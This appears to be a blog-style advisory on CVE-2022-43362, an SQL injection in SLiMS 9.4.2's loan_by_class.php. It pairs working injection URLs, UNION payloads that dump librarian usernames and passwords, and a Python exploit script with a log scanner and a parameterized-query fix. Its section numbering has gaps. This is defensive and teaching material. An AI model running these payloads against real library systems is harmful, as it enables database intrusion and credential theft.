In late 2022, security researchers uncovered a significant vulnerability in the popular Senayan Library Management System (SLiMS), a tool widely used by libraries worldwide for efficient library management. The vulnerability, catalogued as CVE-2022-43362, allows attackers to perform SQL injection through the collType parameter in the loan_by_class.php script.

This long-read will break down how this SQL injection works in plain language, share a proof-of-concept exploit, and discuss how to defend your SLiMS install. If you run or manage a library using SLiMS v9.4.2 (or variants), read carefully: you may be at risk.

What is Senayan Library Management System (SLiMS)?

SLiMS is a free, open-source, web-based library management system used globally by community and institutional libraries. It helps manage collections, loans, memberships, and a lot more. Being widely used, SLiMS becomes a frequent target for attackers seeking out web vulnerabilities.

What’s the Problem in v9.4.2?

In version 9.4.2, the loan_by_class.php page fails to properly sanitize input from the collType GET parameter. Attackers can inject their own SQL statements, possibly accessing, exfiltrating, or even altering the underlying database.

In loan_by_class.php, code similar in shape to the following exists (illustrative, not the project's literal source):

<?php
// Example, for illustration only
$collType = $_GET['collType'];          // untrusted value taken straight from the query string
$sql = "SELECT * FROM loans WHERE collection_type = '$collType'";  // spliced into the SQL text as-is
$result = mysqli_query($db, $sql);      // whatever the attacker wrote is executed by MySQL
// ...
?>

Notice: $collType comes directly from GET parameters and drops into an SQL query without any sanitization.

If you visit

http://your-library-site/loan_by_class.php?collType=Textbook

…the page works fine. But what if you visit

http://your-library-site/loan_by_class.php?collType=Textbook'%20OR%201=1--+

The resulting SQL becomes

SELECT * FROM loans WHERE collection_type = 'Textbook' OR 1=1-- '

Here, the OR 1=1-- clause makes the SQL always return all loans, potentially exposing confidential data, and opening the door for much more sinister attacks.

The CVE Advisory

- CVE ID: CVE-2022-43362

References

- NVD Entry
- Packet Storm Advisory
- Senayan’s GitHub Repository

Suppose the application is hosted at this address

http://library.example.com/loan_by_class.php

Test Parameter

collType=%27 OR 1=1--+

Full URL

http://library.example.com/loan_by_class.php?collType=%27%20OR%201=1--+

If results are wildly different (all loan data exposed), you’ve likely confirmed the vulnerability.

3. Information Disclosure

Suppose you want to extract the current database user. The classic way is to close the original quote, insert a UNION SELECT, and comment out the rest:

http://library.example.com/loan_by_class.php?collType=' UNION SELECT user(),2,3,4--+

*(Note: The actual number of columns in the result must match the original SQL's select statement. You may have to experiment.)*

Sample Exploit Script (Python)

import requests

target = 'http://library.example.com/loan_by_class.php'
payload = "' UNION SELECT user(),database(),3,4--+"  # Adjust columns as needed
r = requests.get(target, params={'collType': payload})
print(r.text)

Almost any data can be dumped with a similar approach:

http://library.example.com/loan_by_class.php?collType=' UNION SELECT username,password,3,4 FROM librarians--+

Warning: Actually dumping user or password data is illegal without authorization.
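The requests shown in this section leave a distinctive footprint in the web server's access log: a quote, a comment marker, or SQL keywords inside a parameter that should only ever hold a plain collection-type name. The following scanner is an added example (not part of the original article or of SLiMS) that parses a few constructed Apache/nginx-style log lines, decodes the collType value of each request to loan_by_class.php, and reports the ones that carry SQL metacharacters. The log lines, IP addresses, timestamps and the marker list are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (not real traffic); the payloads are the
# ones discussed in the article, URL-encoded the way a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Nov/2022:19:20:01 +0000] "GET /loan_by_class.php?collType=Textbook HTTP/1.1" 200 5120
203.0.113.5 - - [01/Nov/2022:19:20:07 +0000] "GET /loan_by_class.php?collType=Textbook'%20OR%201=1--+ HTTP/1.1" 200 88211
203.0.113.5 - - [01/Nov/2022:19:20:15 +0000] "GET /loan_by_class.php?collType=%27%20UNION%20SELECT%20user(),2,3,4--+ HTTP/1.1" 200 910
198.51.100.7 - - [01/Nov/2022:19:21:00 +0000] "GET /index.php?p=member HTTP/1.1" 200 3302
"""

# Common log format: client ip, identity, user, [timestamp], "METHOD URL PROTO", status, bytes
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Tokens that have no business inside a collection-type name (assumed marker list).
SQLI_MARKERS = re.compile(
    r"""('|"|--|/\*|\bOR\b|\bAND\b|\bUNION\b|\bSELECT\b)""", re.IGNORECASE
)


def suspicious_coll_type(url):
    """Return the decoded collType value if it carries SQL metacharacters, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/loan_by_class.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("collType", [])
    for raw in values:
        # parse_qs already decoded once; a second pass also catches double-encoded payloads
        decoded = unquote_plus(raw)
        if SQLI_MARKERS.search(decoded):
            return decoded
    return None


def scan_log(text):
    """Return (ip, timestamp, decoded payload, status) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        payload = suspicious_coll_type(m["url"])
        if payload is not None:
            hits.append((m["ip"], m["ts"], payload, int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, payload, status in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} collType={payload!r}")
```

A single quote in collType is already a strong signal on its own; the keyword markers mainly help rank alerts. Pairing this with the response size (the 88211-byte reply to the OR 1=1 request versus 5120 bytes for the legitimate one) is a cheap way to tell a blocked probe from a successful dump.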

- Sanitize All Input: Use prepared statements or parameterized queries in PHP:

$stmt = $db->prepare("SELECT * FROM loans WHERE collection_type = ?");  // placeholder, not string concatenation
$stmt->bind_param("s", $collType);   // the value is sent as data; quotes and comment markers cannot change the query
$stmt->execute();
$result = $stmt->get_result();
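To see why binding fixes the flaw described above, the following added example (not code from the article or from SLiMS) rebuilds the loan_by_class lookup twice against a small in-memory table: once with the string-splicing pattern shown earlier, once with a bound parameter plus an allow-list. SQLite stands in for MySQL only so the example runs offline; the rows, the collection-type names and the allow-list are constructed for the example.

```python
import sqlite3

# Constructed rows standing in for the SLiMS "loans" table.
SAMPLE_LOANS = [
    (1, "Textbook", "member-001"),
    (2, "Textbook", "member-002"),
    (3, "Reference", "member-003"),
    (4, "Journal", "member-004"),
]

# Assumed allow-list of collection types (hypothetical, not SLiMS's own values).
KNOWN_COLL_TYPES = {"Textbook", "Reference", "Journal"}


def make_db():
    """Create an in-memory database populated with the constructed sample loans."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE loans (id INTEGER, collection_type TEXT, member_id TEXT)")
    db.executemany("INSERT INTO loans VALUES (?, ?, ?)", SAMPLE_LOANS)
    return db


def loans_by_class_vulnerable(db, coll_type):
    """The flawed pattern: untrusted input is spliced into the SQL text."""
    sql = f"SELECT * FROM loans WHERE collection_type = '{coll_type}'"
    return db.execute(sql).fetchall()


def loans_by_class_fixed(db, coll_type, enforce_allow_list=True):
    """Hardened lookup: the value is bound as a parameter, so quote characters
    and comment markers are data, never SQL syntax. The allow-list is a second
    layer that rejects anything that is not a known collection type."""
    if enforce_allow_list and coll_type not in KNOWN_COLL_TYPES:
        return []
    sql = "SELECT * FROM loans WHERE collection_type = ?"
    return db.execute(sql, (coll_type,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "Textbook' OR 1=1-- "   # the article's injection, URL-decoded
    print(len(loans_by_class_vulnerable(db, "Textbook")))   # 2: the two textbook loans
    print(len(loans_by_class_vulnerable(db, payload)))      # 4: every row leaks
    print(len(loans_by_class_fixed(db, payload, False)))    # 0: binding alone already defeats it
    print(len(loans_by_class_fixed(db, payload)))           # 0: allow-list rejects it before any query
```

The bound-parameter version returns nothing for the payload even with the allow-list switched off, because the database looks for a collection type literally named `Textbook' OR 1=1-- ` rather than interpreting the text. The allow-list is still worth keeping: it turns a malformed value into an early, loggable rejection instead of an empty result set.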

- Update to the Latest Version: Monitor Senayan's official release channels and apply security fixes promptly.

Official References

- NIST NVD: CVE-2022-43362
- Exploit Details: Packet Storm SLiMS 9.4.2 SQL Injection
- SLiMS Repository: slims9_bulian on GitHub

Conclusion

CVE-2022-43362 is a serious SQL Injection flaw affecting Senayan Library Management System v9.4.2. If left unpatched, it exposes libraries to data theft and database manipulation. The best fix is immediate upgrade, vigilant sanitization, and ongoing awareness of new vulnerabilities.

If you’re in charge of a SLiMS-powered library, patch now—or risk the integrity of your users and collections.

Timeline

Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/02/2022 15:38:00 UTC